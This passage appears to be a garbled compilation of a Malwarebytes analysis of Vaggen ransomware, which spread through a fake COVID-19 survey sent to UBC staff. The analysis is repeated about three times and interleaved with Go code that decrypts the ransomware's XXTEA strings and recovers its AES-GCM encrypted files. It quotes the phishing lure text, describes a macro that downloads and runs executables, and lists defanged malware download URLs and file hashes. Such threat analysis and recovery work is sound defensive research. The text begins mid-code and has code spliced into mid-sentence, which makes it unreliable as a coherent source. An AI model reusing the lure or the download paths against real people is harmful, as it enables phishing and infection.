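	}
	return out, nil
}

// xxteaKey zero-pads a short key such as "STALKER" to the 16 bytes XXTEA needs.
func xxteaKey(key string) []uint32 {
	var buf [16]byte
	copy(buf[:], key)
	return bytesToWords(buf[:], false)
}

// DecryptXXTEAString reverses the string protection: Base64-decode, then XXTEA-decrypt.
func DecryptXXTEAString(b64, key string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil || len(raw) == 0 || len(raw)%4 != 0 {
		return "", errors.New("input is not Base64 of whole 32-bit words")
	}
	w := bytesToWords(raw, false)
	xxteaDecryptWords(w, xxteaKey(key))
	out, err := wordsToBytes(w, true)
	return string(out), err
}

// EncryptXXTEAString is the forward direction, used here only to build a sample.
func EncryptXXTEAString(plain, key string) string {
	w := bytesToWords([]byte(plain), true)
	xxteaEncryptWords(w, xxteaKey(key))
	raw, _ := wordsToBytes(w, false)
	return base64.StdEncoding.EncodeToString(raw)
}

func main() {
	blob := EncryptXXTEAString("Your files have been encrypted.", "STALKER") // constructed text
	fmt.Println(DecryptXXTEAString(blob, "STALKER"))
}
```

To apply it to a real sample, feed each Base64 blob recovered from the binary to DecryptXXTEAString; a length-word error on every blob means the framing assumption above does not match the library build the author used and should be rechecked in the disassembly.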
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2167 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2168 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2169 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2170 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2171 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2172 of 3467\n\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. 
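Given the .VAGGEN layout described above (12-byte nonce, ciphertext, 16-byte GCM tag) and the hardcoded 32-byte key, recovering a file is a single AES-256-GCM decryption. The Go below is an added example written for this page, not the malware's code or a Malwarebytes tool; it uses only the standard crypto/cipher API, and the plaintext it seals to build a test fixture is constructed.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

// Key quoted in the write-up: 32 bytes, which selects AES-256.
const vaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const (
	nonceSize = 12 // GCM nonce, stored as the first 12 bytes of a .VAGGEN file
	tagSize   = 16 // GCM tag, appended by gcm.Seal after the ciphertext
)

// newGCM builds the AES-256-GCM instance shared by the fixture builder and
// the recovery routine. cipher.NewGCM defaults to a 12-byte nonce and 16-byte tag.
func newGCM(key []byte) (cipher.AEAD, error) {
	if len(key) != 32 {
		return nil, fmt.Errorf("expected 32-byte key, got %d", len(key))
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// RecoverVaggen decrypts one .VAGGEN file laid out as nonce || ciphertext || tag.
// gcm.Open verifies the tag, so a truncated or tampered file (or a wrong key)
// is rejected with an error instead of silently yielding garbage.
func RecoverVaggen(encrypted, key []byte) ([]byte, error) {
	if len(encrypted) < nonceSize+tagSize {
		return nil, errors.New("file too short to hold a nonce and a GCM tag")
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce, sealed := encrypted[:nonceSize], encrypted[nonceSize:]
	return gcm.Open(nil, nonce, sealed, nil)
}

// encryptLikeVaggen builds a test fixture in the same layout the write-up
// describes (random nonce, gcm.Seal output appended). It exists only so the
// example runs offline; the nonce source here is crypto/rand, not CryptGenRandom.
func encryptLikeVaggen(plaintext, key []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	// Seal appends ciphertext||tag to dst, so passing nonce as dst yields
	// nonce||ciphertext||tag in one buffer.
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// RoundTrip seals a constructed plaintext the way the sample does and checks
// that RecoverVaggen gets it back byte for byte.
func RoundTrip(plaintext []byte) (bool, error) {
	key := []byte(vaggenKey)
	enc, err := encryptLikeVaggen(plaintext, key)
	if err != nil {
		return false, err
	}
	dec, err := RecoverVaggen(enc, key)
	if err != nil {
		return false, err
	}
	return bytes.Equal(dec, plaintext), nil
}

func main() {
	sample := []byte("constructed sample document content") // constructed input
	ok, err := RoundTrip(sample)
	fmt.Println("recovered:", ok, "err:", err)
}
```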
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2207 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2208 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2209 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2210 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2211 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2212 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2213 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2214 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2215 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2216 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2217 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2218 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2219 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2220 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2221 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2222 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2223 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2224 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2225 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2226 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2227 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2228 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2229 of 